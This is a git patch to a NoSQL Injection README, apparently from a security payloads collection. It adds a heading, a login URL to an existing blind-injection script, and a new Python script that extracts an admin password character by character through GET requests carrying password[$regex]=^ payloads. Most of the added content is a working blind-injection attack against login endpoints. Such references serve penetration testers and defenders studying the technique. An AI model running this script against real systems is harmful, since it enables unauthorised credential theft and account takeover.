From e467d6096a100498f4bcb89b5118e90343669232 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sun, 21 Apr 2019 13:00:16 +0200
Subject: [PATCH] add nosqli GET example

---
 NoSQL Injection/README.md | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md
index 21f8a0f..1548bd4 100644
--- a/NoSQL Injection/README.md	
+++ b/NoSQL Injection/README.md	
@@ -50,6 +50,9 @@ Extract data with "in"
 
 ## Blind NoSQL
 
+### POST with JSON body
+
+
 ```python
 import requests
 import urllib3
@@ -59,6 +62,7 @@ urllib3.disable_warnings()
 
 username="admin"
 password=""
+u="http://example.org/login"
 
 while True:
     for c in string.printable:
@@ -70,6 +74,29 @@ while True:
                 password += c
 ```
 
+### GET
+
+```python
+import requests
+import urllib3
+import string
+import urllib
+urllib3.disable_warnings()
+
+username='admin'
+password=''
+u='http://example.org/login'
+
+while True:
+  for c in string.printable:
+    if c not in ['*','+','.','?','|', '#', '&', '$']:
+      payload='?username=%s&password[$regex]=^%s' % (username, password + c)
+      r = requests.get(u + payload)
+      if 'Yeah' in r.text:
+        print("Found one more char : %s" % (password+c))
+        password += c
+```
+
 ## MongoDB Payloads
 
 ```bash